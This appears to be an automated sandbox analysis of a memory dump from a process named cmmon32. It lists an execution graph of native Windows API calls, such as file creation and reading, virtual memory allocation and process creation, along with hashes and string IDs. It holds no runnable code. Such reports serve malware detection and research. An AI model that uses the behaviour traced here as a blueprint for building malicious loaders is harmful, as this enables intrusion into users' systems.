                                                                                                  execution_graph 99599 419080 99600 419086 99599->99600 99611 41bd40 99600->99611 99602 41919c 99603 4190bb 99603->99602 99614 40acf0 99603->99614 99605 4190f1 99619 414e50 99605->99619 99607 419120 Sleep 99608 41910d 99607->99608 99608->99602 99608->99607 99624 418ca0 LdrLoadDll 99608->99624 99625 418eb0 LdrLoadDll 99608->99625 99626 41a540 99611->99626 99613 41bd6d 99613->99603 99616 40ad14 99614->99616 99615 40ad1b 99615->99605 99616->99615 99617 40ad50 LdrLoadDll 99616->99617 99618 40ad67 99616->99618 99617->99618 99618->99605 99620 414e5e 99619->99620 99622 414e6a 99619->99622 99620->99622 99633 4152d0 LdrLoadDll 99620->99633 99622->99608 99623 414fbc 99623->99608 99624->99608 99625->99608 99629 41af60 99626->99629 99628 41a55c NtAllocateVirtualMemory 99628->99613 99630 41af70 99629->99630 99632 41af92 99629->99632 99631 414e50 LdrLoadDll 99630->99631 99631->99632 99632->99628 99633->99623 99634 41f1bd 99637 41b9d0 99634->99637 99638 41b9f6 99637->99638 99645 409d40 99638->99645 99640 41ba02 99641 41ba26 99640->99641 99653 408f30 99640->99653 99691 41a6b0 99641->99691 99644 41ba37 99696 409c90 99645->99696 99647 409d4d 99648 409d54 99647->99648 99708 409c30 99647->99708 99648->99640 99654 408f57 99653->99654 100104 40b1c0 99654->100104 99656 408f69 100108 40af10 99656->100108 99658 408f86 99665 408f8d 99658->99665 100179 40ae40 LdrLoadDll 99658->100179 99660 4090f2 99660->99641 99662 408ffc 100124 40f410 99662->100124 99664 409006 99664->99660 99666 41bf90 2 API calls 99664->99666 99665->99660 100112 40f380 99665->100112 99667 40902a 99666->99667 99668 41bf90 2 API calls 99667->99668 99669 40903b 99668->99669 99670 41bf90 2 API calls 99669->99670 99671 40904c 99670->99671 100136 40ca90 99671->100136 99673 409059 99674 414a50 8 API calls 99673->99674 99675 409066 99674->99675 99676 414a50 8 API calls 99675->99676 99677 409077 99676->99677 99678 409084 99677->99678 99679 4090a5 99677->99679 100146 40d620 99678->100146 99681 414a50 8 API calls 99679->99681 99686 4090c1 99681->99686 99684 408d00 24 API calls 99684->99660 99685 409092 100162 408d00 99685->100162 99690 4090e9 99686->99690 100180 40d6c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 99686->100180 99690->99684 99692 41a6cf 99691->99692 99693 41af60 LdrLoadDll 99691->99693 99692->99644 99694 41a6ff CreateProcessInternalW 99692->99694 99695 41af60 LdrLoadDll 99692->99695 99693->99692 99694->99644 99695->99694 99697 409ca3 99696->99697 99747 418bc0 LdrLoadDll 99696->99747 99727 418a70 99697->99727 99700 409cb6 99700->99647 99701 409cac 99701->99700 99730 41b2b0 99701->99730 99703 409cf3 99703->99700 99741 409ab0 99703->99741 99705 409d13 99748 409620 LdrLoadDll 99705->99748 99707 409d25 99707->99647 99709 409c4a 99708->99709 99710 41b5a0 LdrLoadDll 99708->99710 100083 41b5a0 99709->100083 99710->99709 99713 41b5a0 LdrLoadDll 99714 409c71 99713->99714 99715 40f180 99714->99715 99716 40f199 99715->99716 100087 40b040 99716->100087 99718 40f1ac 100091 41a1e0 99718->100091 99722 40f1fd 99724 41a490 2 API calls 99722->99724 99723 40f1d2 99723->99722 100097 41a260 99723->100097 99726 409d65 99724->99726 99726->99640 99749 41a600 99727->99749 99731 41b2c9 99730->99731 99752 414a50 99731->99752 99733 41b2e1 99734 41b2ea 99733->99734 99791 41b0f0 99733->99791 99734->99703 99736 41b2fe 99736->99734 99809 419f00 99736->99809 99744 409aca 99741->99744 100061 407ea0 99741->100061 99743 409ad1 99743->99705 99744->99743 100074 408160 99744->100074 99747->99697 99748->99707 99750 418a85 99749->99750 99751 41af60 LdrLoadDll 99749->99751 99750->99701 99751->99750 99753 414d85 99752->99753 99755 414a64 99752->99755 99753->99733 99755->99753 99817 419c50 99755->99817 99757 414b90 99820 41a360 99757->99820 99758 414b73 99877 41a460 LdrLoadDll 99758->99877 99761 414bb7 99763 41bdc0 2 API calls 99761->99763 99762 414b7d 99762->99733 99765 414bc3 99763->99765 99764 414d49 99767 41a490 2 API calls 99764->99767 99765->99762 99765->99764 99766 414d5f 99765->99766 99771 414c52 99765->99771 99886 414790 LdrLoadDll NtReadFile NtClose 99766->99886 99769 414d50 99767->99769 99769->99733 99770 414d72 99770->99733 99772 414cb9 99771->99772 99774 414c61 99771->99774 99772->99764 99773 414ccc 99772->99773 99879 41a2e0 99773->99879 99776 414c66 99774->99776 99777 414c7a 99774->99777 99878 414650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 99776->99878 99780 414c97 99777->99780 99781 414c7f 99777->99781 99780->99769 99835 414410 99780->99835 99823 4146f0 99781->99823 99783 414c70 99783->99733 99786 414d2c 99883 41a490 99786->99883 99787 414c8d 99787->99733 99788 414caf 99788->99733 99790 414d38 99790->99733 99792 41b101 99791->99792 99793 41b113 99792->99793 99794 41bd40 2 API calls 99792->99794 99793->99736 99795 41b134 99794->99795 99906 414070 99795->99906 99797 41b180 99797->99736 99798 41b157 99798->99797 99799 414070 3 API calls 99798->99799 99802 41b179 99799->99802 99801 41b20a 99804 41b21a 99801->99804 100032 41af00 LdrLoadDll 99801->100032 99802->99797 99938 415390 99802->99938 99948 41ad70 99804->99948 99806 41b248 100027 419ec0 99806->100027 99810 419f1c 99809->99810 99811 41af60 LdrLoadDll 99809->99811 100055 43e2c0a 99810->100055 99811->99810 99812 419f37 99814 41bdc0 99812->99814 100058 41a670 99814->100058 99816 41b359 99816->99703 99818 414b44 99817->99818 99819 41af60 LdrLoadDll 99817->99819 99818->99757 99818->99758 99818->99762 99819->99818 99821 41af60 LdrLoadDll 99820->99821 99822 41a37c NtCreateFile 99821->99822 99822->99761 99824 41470c 99823->99824 99825 41a2e0 LdrLoadDll 99824->99825 99826 41472d 99825->99826 99827 414734 99826->99827 99828 414748 99826->99828 99829 41a490 2 API calls 99827->99829 99830 41a490 2 API calls 99828->99830 99831 41473d 99829->99831 99832 414751 99830->99832 99831->99787 99887 41bfd0 99832->99887 99834 41475c 99834->99787 99836 41445b 99835->99836 99837 41448e 99835->99837 99838 41a2e0 LdrLoadDll 99836->99838 99839 4145d9 99837->99839 99843 4144aa 99837->99843 99840 414476 99838->99840 99841 41a2e0 LdrLoadDll 99839->99841 99842 41a490 2 API calls 99840->99842 99846 4145f4 99841->99846 99844 41447f 99842->99844 99845 41a2e0 LdrLoadDll 99843->99845 99844->99788 99847 4144c5 99845->99847 99905 41a320 LdrLoadDll 99846->99905 99849 4144e1 99847->99849 99850 4144cc 99847->99850 99853 4144e6 99849->99853 99854 4144fc 99849->99854 99852 41a490 2 API calls 99850->99852 99851 41462e 99856 41a490 2 API calls 99851->99856 99857 4144d5 99852->99857 99855 41a490 2 API calls 99853->99855 99862 414501 99854->99862 99893 41bf90 99854->99893 99858 4144ef 99855->99858 99859 414639 99856->99859 99857->99788 99858->99788 99859->99788 99870 414513 99862->99870 99896 41a410 99862->99896 99863 414567 99864 41457e 99863->99864 99904 41a2a0 LdrLoadDll 99863->99904 99866 414585 99864->99866 99867 41459a 99864->99867 99868 41a490 2 API calls 99866->99868 99869 41a490 2 API calls 99867->99869 99868->99870 99871 4145a3 99869->99871 99870->99788 99872 4145cf 99871->99872 99899 41bb90 99871->99899 99872->99788 99874 4145ba 99875 41bdc0 2 API calls 99874->99875 99876 4145c3 99875->99876 99876->99788 99877->99762 99878->99783 99880 414d14 99879->99880 99881 41af60 LdrLoadDll 99879->99881 99882 41a320 LdrLoadDll 99880->99882 99881->99880 99882->99786 99884 41a4ac NtClose 99883->99884 99885 41af60 LdrLoadDll 99883->99885 99884->99790 99885->99884 99886->99770 99889 41bfea 99887->99889 99890 41a630 99887->99890 99889->99834 99891 41af60 LdrLoadDll 99890->99891 99892 41a64c RtlAllocateHeap 99891->99892 99892->99889 99894 41a630 2 API calls 99893->99894 99895 41bfa8 99893->99895 99894->99895 99895->99862 99897 41a42c NtReadFile 99896->99897 99898 41af60 LdrLoadDll 99896->99898 99897->99863 99898->99897 99900 41bbb4 99899->99900 99901 41bb9d 99899->99901 99900->99874 99901->99900 99902 41bf90 2 API calls 99901->99902 99903 41bbcb 99902->99903 99903->99874 99904->99864 99905->99851 99907 414081 99906->99907 99908 414089 99906->99908 99907->99798 99937 41435c 99908->99937 100033 41cf30 99908->100033 99910 4140dd 99911 41cf30 2 API calls 99910->99911 99914 4140e8 99911->99914 99912 414136 99915 41cf30 2 API calls 99912->99915 99914->99912 99916 41d060 3 API calls 99914->99916 100047 41cfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 99914->100047 99917 41414a 99915->99917 99916->99914 99918 4141a7 99917->99918 100038 41d060 99917->100038 99919 41cf30 2 API calls 99918->99919 99921 4141bd 99919->99921 99922 4141fa 99921->99922 99924 41d060 3 API calls 99921->99924 99923 41cf30 2 API calls 99922->99923 99925 414205 99923->99925 99924->99921 99926 41d060 3 API calls 99925->99926 99932 41423f 99925->99932 99926->99925 99929 41cf90 2 API calls 99930 41433e 99929->99930 99931 41cf90 2 API calls 99930->99931 99933 414348 99931->99933 100044 41cf90 99932->100044 99934 41cf90 2 API calls 99933->99934 99935 414352 99934->99935 99936 41cf90 2 API calls 99935->99936 99936->99937 99937->99798 99939 4153a1 99938->99939 99940 414a50 8 API calls 99939->99940 99941 4153b7 99940->99941 99942 4153f2 99941->99942 99943 415405 99941->99943 99947 41540a 99941->99947 99944 41bdc0 2 API calls 99942->99944 99945 41bdc0 2 API calls 99943->99945 99946 4153f7 99944->99946 99945->99947 99946->99801 99947->99801 99949 41ad84 99948->99949 99950 41ac30 LdrLoadDll 99948->99950 100048 41ac30 99949->100048 99950->99949 99952 41ad8d 99953 41ac30 LdrLoadDll 99952->99953 99954 41ad96 99953->99954 99955 41ac30 LdrLoadDll 99954->99955 99956 41ad9f 99955->99956 99957 41ac30 LdrLoadDll 99956->99957 99958 41ada8 99957->99958 99959 41ac30 LdrLoadDll 99958->99959 99960 41adb1 99959->99960 99961 41ac30 LdrLoadDll 99960->99961 99962 41adbd 99961->99962 99963 41ac30 LdrLoadDll 99962->99963 99964 41adc6 99963->99964 99965 41ac30 LdrLoadDll 99964->99965 99966 41adcf 99965->99966 99967 41ac30 LdrLoadDll 99966->99967 99968 41add8 99967->99968 99969 41ac30 LdrLoadDll 99968->99969 99970 41ade1 99969->99970 99971 41ac30 LdrLoadDll 99970->99971 99972 41adea 99971->99972 99973 41ac30 LdrLoadDll 99972->99973 99974 41adf6 99973->99974 99975 41ac30 LdrLoadDll 99974->99975 99976 41adff 99975->99976 99977 41ac30 LdrLoadDll 99976->99977 99978 41ae08 99977->99978 99979 41ac30 LdrLoadDll 99978->99979 99980 41ae11 99979->99980 99981 41ac30 LdrLoadDll 99980->99981 99982 41ae1a 99981->99982 99983 41ac30 LdrLoadDll 99982->99983 99984 41ae23 99983->99984 99985 41ac30 LdrLoadDll 99984->99985 99986 41ae2f 99985->99986 99987 41ac30 LdrLoadDll 99986->99987 99988 41ae38 99987->99988 99989 41ac30 LdrLoadDll 99988->99989 99990 41ae41 99989->99990 99991 41ac30 LdrLoadDll 99990->99991 99992 41ae4a 99991->99992 99993 41ac30 LdrLoadDll 99992->99993 99994 41ae53 99993->99994 99995 41ac30 LdrLoadDll 99994->99995 99996 41ae5c 99995->99996 99997 41ac30 LdrLoadDll 99996->99997 99998 41ae68 99997->99998 99999 41ac30 LdrLoadDll 99998->99999 100000 41ae71 99999->100000 100001 41ac30 LdrLoadDll 100000->100001 100002 41ae7a 100001->100002 100003 41ac30 LdrLoadDll 100002->100003 100004 41ae83 100003->100004 100005 41ac30 LdrLoadDll 100004->100005 100006 41ae8c 100005->100006 100007 41ac30 LdrLoadDll 100006->100007 100008 41ae95 100007->100008 100009 41ac30 LdrLoadDll 100008->100009 100010 41aea1 100009->100010 100011 41ac30 LdrLoadDll 100010->100011 100012 41aeaa 100011->100012 100013 41ac30 LdrLoadDll 100012->100013 100014 41aeb3 100013->100014 100015 41ac30 LdrLoadDll 100014->100015 100016 41aebc 100015->100016 100017 41ac30 LdrLoadDll 100016->100017 100018 41aec5 100017->100018 100019 41ac30 LdrLoadDll 100018->100019 100020 41aece 100019->100020 100021 41ac30 LdrLoadDll 100020->100021 100022 41aeda 100021->100022 100023 41ac30 LdrLoadDll 100022->100023 100024 41aee3 100023->100024 100025 41ac30 LdrLoadDll 100024->100025 100026 41aeec 100025->100026 100026->99806 100028 41af60 LdrLoadDll 100027->100028 100029 419edc 100028->100029 100054 43e2df0 LdrInitializeThunk 100029->100054 100030 419ef3 100030->99736 100032->99804 100034 41cf40 100033->100034 100035 41cf46 100033->100035 100034->99910 100036 41bf90 2 API calls 100035->100036 100037 41cf6c 100036->100037 100037->99910 100039 41cfd0 100038->100039 100040 41bf90 2 API calls 100039->100040 100041 41d02d 100039->100041 100042 41d00a 100040->100042 100041->99917 100043 41bdc0 2 API calls 100042->100043 100043->100041 100045 414334 100044->100045 100046 41bdc0 2 API calls 100044->100046 100045->99929 100046->100045 100047->99914 100049 41ac4b 100048->100049 100050 414e50 LdrLoadDll 100049->100050 100051 41ac6b 100050->100051 100052 414e50 LdrLoadDll 100051->100052 100053 41ad17 100051->100053 100052->100053 100053->99952 100053->100053 100054->100030 100056 43e2c1f LdrInitializeThunk 100055->100056 100057 43e2c11 100055->100057 100056->99812 100057->99812 100059 41a68c RtlFreeHeap 100058->100059 100060 41af60 LdrLoadDll 100058->100060 100059->99816 100060->100059 100062 407eb0 100061->100062 100063 407eab 100061->100063 100064 41bd40 2 API calls 100062->100064 100063->99744 100070 407ed5 100064->100070 100065 407f38 100065->99744 100066 419ec0 2 API calls 100066->100070 100067 407f3e 100069 407f64 100067->100069 100071 41a5c0 2 API calls 100067->100071 100069->99744 100070->100065 100070->100066 100070->100067 100072 41bd40 2 API calls 100070->100072 100077 41a5c0 100070->100077 100073 407f55 100071->100073 100072->100070 100073->99744 100075 40817e 100074->100075 100076 41a5c0 2 API calls 100074->100076 100075->99705 100076->100075 100078 41af60 LdrLoadDll 100077->100078 100079 41a5dc 100078->100079 100082 43e2c70 LdrInitializeThunk 100079->100082 100080 41a5f3 100080->100070 100082->100080 100084 41b5c3 100083->100084 100085 40acf0 LdrLoadDll 100084->100085 100086 409c5b 100085->100086 100086->99713 100089 40b063 100087->100089 100088 40b0e0 100088->99718 100089->100088 100102 419c90 LdrLoadDll 100089->100102 100092 41af60 LdrLoadDll 100091->100092 100093 40f1bb 100092->100093 100093->99726 100094 41a7d0 100093->100094 100095 41af60 LdrLoadDll 100094->100095 100096 41a7ef LookupPrivilegeValueW 100095->100096 100096->99723 100098 41a27c 100097->100098 100099 41af60 LdrLoadDll 100097->100099 100103 43e2ea0 LdrInitializeThunk 100098->100103 100099->100098 100100 41a29b 100100->99722 100102->100088 100103->100100 100105 40b1f0 100104->100105 100106 40b040 LdrLoadDll 100105->100106 100107 40b204 100106->100107 100107->99656 100109 40af34 100108->100109 100181 419c90 LdrLoadDll 100109->100181 100111 40af6e 100111->99658 100113 40f3ac 100112->100113 100114 40b1c0 LdrLoadDll 100113->100114 100115 40f3be 100114->100115 100182 40f290 100115->100182 100118 40f3d9 100119 41a490 2 API calls 100118->100119 100121 40f3e4 100118->100121 100119->100121 100120 40f3f1 100122 41a490 2 API calls 100120->100122 100123 40f402 100120->100123 100121->99662 100122->100123 100123->99662 100125 40f43c 100124->100125 100201 40b2b0 100125->100201 100127 40f44e 100128 40f290 3 API calls 100127->100128 100129 40f45f 100128->100129 100130 40f481 100129->100130 100131 40f469 100129->100131 100132 40f492 100130->100132 100135 41a490 2 API calls 100130->100135 100133 40f474 100131->100133 100134 41a490 2 API calls 100131->100134 100132->99664 100133->99664 100134->100133 100135->100132 100137 40caa6 100136->100137 100138 40cab0 100136->100138 100137->99673 100139 40af10 LdrLoadDll 100138->100139 100140 40cb4e 100139->100140 100141 40cb74 100140->100141 100142 40b040 LdrLoadDll 100140->100142 100141->99673 100143 40cb90 100142->100143 100144 414a50 8 API calls 100143->100144 100145 40cbe5 100144->100145 100145->99673 100147 40d646 100146->100147 100148 40b040 LdrLoadDll 100147->100148 100149 40d65a 100148->100149 100205 40d310 100149->100205 100151 40908b 100152 40cc00 100151->100152 100153 40cc26 100152->100153 100154 40b040 LdrLoadDll 100153->100154 100155 40cca9 100153->100155 100154->100155 100156 40b040 LdrLoadDll 100155->100156 100157 40cd16 100156->100157 100158 40af10 LdrLoadDll 100157->100158 100159 40cd7f 100158->100159 100160 40b040 LdrLoadDll 100159->100160 100161 40ce2f 100160->100161 100161->99685 100165 408d14 100162->100165 100234 40f6d0 100162->100234 100164 408f25 100164->99641 100165->100164 100239 4143a0 100165->100239 100167 408d70 100167->100164 100242 408ab0 100167->100242 100170 41cf30 2 API calls 100171 408db2 100170->100171 100172 41d060 3 API calls 100171->100172 100176 408dc7 100172->100176 100173 407ea0 4 API calls 100173->100176 100176->100164 100176->100173 100177 40c7b0 18 API calls 100176->100177 100178 408160 2 API calls 100176->100178 100247 40f670 100176->100247 100251 40f080 22 API calls 100176->100251 100177->100176 100178->100176 100179->99665 100180->99690 100181->100111 100183 40f2aa 100182->100183 100191 40f360 100182->100191 100184 40b040 LdrLoadDll 100183->100184 100185 40f2cc 100184->100185 100192 419f40 100185->100192 100187 40f30e 100195 419f80 100187->100195 100190 41a490 2 API calls 100190->100191 100191->100118 100191->100120 100193 41af60 LdrLoadDll 100192->100193 100194 419f5c 100193->100194 100194->100187 100196 419f9c 100195->100196 100197 41af60 LdrLoadDll 100195->100197 100200 43e35c0 LdrInitializeThunk 100196->100200 100197->100196 100198 40f354 100198->100190 100200->100198 100202 40b2d7 100201->100202 100203 40b040 LdrLoadDll 100202->100203 100204 40b313 100203->100204 100204->100127 100206 40d327 100205->100206 100214 40f710 100206->100214 100210 40d39b 100211 40d3a2 100210->100211 100225 41a2a0 LdrLoadDll 100210->100225 100211->100151 100213 40d3b5 100213->100151 100215 40f735 100214->100215 100226 4081a0 100215->100226 100217 40d36f 100222 41a6e0 100217->100222 100218 414a50 8 API calls 100220 40f759 100218->100220 100220->100217 100220->100218 100221 41bdc0 2 API calls 100220->100221 100233 40f550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 100220->100233 100221->100220 100223 41a6ff CreateProcessInternalW 100222->100223 100224 41af60 LdrLoadDll 100222->100224 100223->100210 100224->100223 100225->100213 100227 40829f 100226->100227 100228 4081b5 100226->100228 100227->100220 100228->100227 100229 414a50 8 API calls 100228->100229 100230 408222 100229->100230 100231 41bdc0 2 API calls 100230->100231 100232 408249 100230->100232 100231->100232 100232->100220 100233->100220 100235 40f6ef 100234->100235 100236 414e50 LdrLoadDll 100234->100236 100237 40f6f6 SetErrorMode 100235->100237 100238 40f6fd 100235->100238 100236->100235 100237->100238 100238->100165 100252 40f4a0 100239->100252 100241 4143c6 100241->100167 100243 41bd40 2 API calls 100242->100243 100246 408ad5 100242->100246 100243->100246 100244 408cea 100244->100170 100246->100244 100271 419880 100246->100271 100248 40f683 100247->100248 100319 419e90 100248->100319 100251->100176 100253 40f4bd 100252->100253 100259 419fc0 100253->100259 100256 40f505 100256->100241 100260 41af60 LdrLoadDll 100259->100260 100261 419fdc 100260->100261 100269 43e2f30 LdrInitializeThunk 100261->100269 100262 40f4fe 100262->100256 100264 41a010 100262->100264 100265 41af60 LdrLoadDll 100264->100265 100266 41a02c 100265->100266 100270 43e2d10 LdrInitializeThunk 100266->100270 100267 40f52e 100267->100241 100269->100262 100270->100267 100272 41bf90 2 API calls 100271->100272 100273 419897 100272->100273 100292 409310 100273->100292 100275 4198b2 100276 4198f0 100275->100276 100277 4198d9 100275->100277 100280 41bd40 2 API calls 100276->100280 100278 41bdc0 2 API calls 100277->100278 100279 4198e6 100278->100279 100279->100244 100281 41992a 100280->100281 100282 41bd40 2 API calls 100281->100282 100283 419943 100282->100283 100289 419be4 100283->100289 100298 41bd80 LdrLoadDll 100283->100298 100285 419bc9 100286 419bd0 100285->100286 100285->100289 100287 41bdc0 2 API calls 100286->100287 100288 419bda 100287->100288 100288->100244 100290 41bdc0 2 API calls 100289->100290 100291 419c39 100290->100291 100291->100244 100293 409335 100292->100293 100294 40acf0 LdrLoadDll 100293->100294 100295 409368 100294->100295 100297 40938d 100295->100297 100299 40cf20 100295->100299 100297->100275 100298->100285 100300 40cf4c 100299->100300 100301 41a1e0 LdrLoadDll 100300->100301 100302 40cf65 100301->100302 100303 40cf6c 100302->100303 100310 41a220 100302->100310 100303->100297 100307 40cfa7 100308 41a490 2 API calls 100307->100308 100309 40cfca 100308->100309 100309->100297 100311 41a23c 100310->100311 100312 41af60 LdrLoadDll 100310->100312 100318 43e2ca0 LdrInitializeThunk 100311->100318 100312->100311 100313 40cf8f 100313->100303 100315 41a810 100313->100315 100316 41a82f 100315->100316 100317 41af60 LdrLoadDll 100315->100317 100316->100307 100317->100316 100318->100313 100320 41af60 LdrLoadDll 100319->100320 100321 419eac 100320->100321 100324 43e2dd0 LdrInitializeThunk 100321->100324 100322 40f6ae 100322->100176 100324->100322 100328 43e2ad0 LdrInitializeThunk

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 358 41a48a-41a48d 359 41a481-41a489 358->359 360 41a48f-41a4b9 call 41af60 NtClose 358->360
                                                                                                  APIs
                                                                                                  • NtClose.NTDLL(PMA,?,?,00414D50,00000000,FFFFFFFF), ref: 0041A4B5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Close
                                                                                                  • String ID: PMA$}KA
                                                                                                  • API String ID: 3535843008-163805728
                                                                                                  • Opcode ID: 379bf8c8bc80f6b04e513f4be78273d8523dd32beb7ad9743bc4c1f83bf53e98
                                                                                                  • Instruction ID: 27b2774977dc75779a16d9e6a36301c1ab18ded06c0ae9908cf23c73c8696345
                                                                                                  • Opcode Fuzzy Hash: 379bf8c8bc80f6b04e513f4be78273d8523dd32beb7ad9743bc4c1f83bf53e98
                                                                                                  • Instruction Fuzzy Hash: B8E0D8726001187ED614EBE8DC45EEBB76CEF80754F15405BF50C5B142C531B1208BE4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 407 41a360-41a3b1 call 41af60 NtCreateFile
                                                                                                  APIs
                                                                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,00414BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00414BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0041A3AD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateFile
                                                                                                  • String ID: .z`
                                                                                                  • API String ID: 823142352-1441809116
                                                                                                  • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                  • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                                                                                  • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                  • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 410 41a40a-41a459 call 41af60 NtReadFile
                                                                                                  APIs
                                                                                                  • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1JA,FFFFFFFF,?,rMA,?,00000000), ref: 0041A455
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FileRead
                                                                                                  • String ID: 1JA
                                                                                                  • API String ID: 2738559852-3517284412
                                                                                                  • Opcode ID: a8c31c965dde8a16d6a61a5e189a38e7ae4e22b2e4c6ed7b0e628d5b7b97c746
                                                                                                  • Instruction ID: fc01f0a9a7a463296cdf2ddec04be91dd5259237522f72ac8338e5fe6fb0ed92
                                                                                                  • Opcode Fuzzy Hash: a8c31c965dde8a16d6a61a5e189a38e7ae4e22b2e4c6ed7b0e628d5b7b97c746
                                                                                                  • Instruction Fuzzy Hash: F0F0E7B2200108ABCB08DF89CC80DEB77A9EF8C714F15824DBA0D97250C630E911CBA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 413 41a410-41a426 414 41a42c-41a459 NtReadFile 413->414 415 41a427 call 41af60 413->415 415->414
                                                                                                  APIs
                                                                                                  • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1JA,FFFFFFFF,?,rMA,?,00000000), ref: 0041A455
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FileRead
                                                                                                  • String ID: 1JA
                                                                                                  • API String ID: 2738559852-3517284412
                                                                                                  • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                  • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                                                                                  • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                  • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 425 41a490-41a4a6 426 41a4ac-41a4b9 NtClose 425->426 427 41a4a7 call 41af60 425->427 427->426
                                                                                                  APIs
                                                                                                  • NtClose.NTDLL(PMA,?,?,00414D50,00000000,FFFFFFFF), ref: 0041A4B5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Close
                                                                                                  • String ID: PMA
                                                                                                  • API String ID: 3535843008-3622942700
                                                                                                  • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                  • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                                                                                  • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                  • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00402D11,00002000,00003000,00000004), ref: 0041A579
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 2167126740-0
                                                                                                  • Opcode ID: e7732ef2b78dfb3062562d0d57d351e69e2af1cbbe413eece3aa4b3ab6b2d1e0
                                                                                                  • Instruction ID: f8e3cdc54e06309fc8146fb881595e2c36c995c32cb6fa008751c380793c3acf
                                                                                                  • Opcode Fuzzy Hash: e7732ef2b78dfb3062562d0d57d351e69e2af1cbbe413eece3aa4b3ab6b2d1e0
                                                                                                  • Instruction Fuzzy Hash: 5BF0F8B6210208AFDB14DF89CC81EEB77A9AF8C654F158149FA4997242C634F911CBA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00402D11,00002000,00003000,00000004), ref: 0041A579
                                                                                                  Memory Dump Source
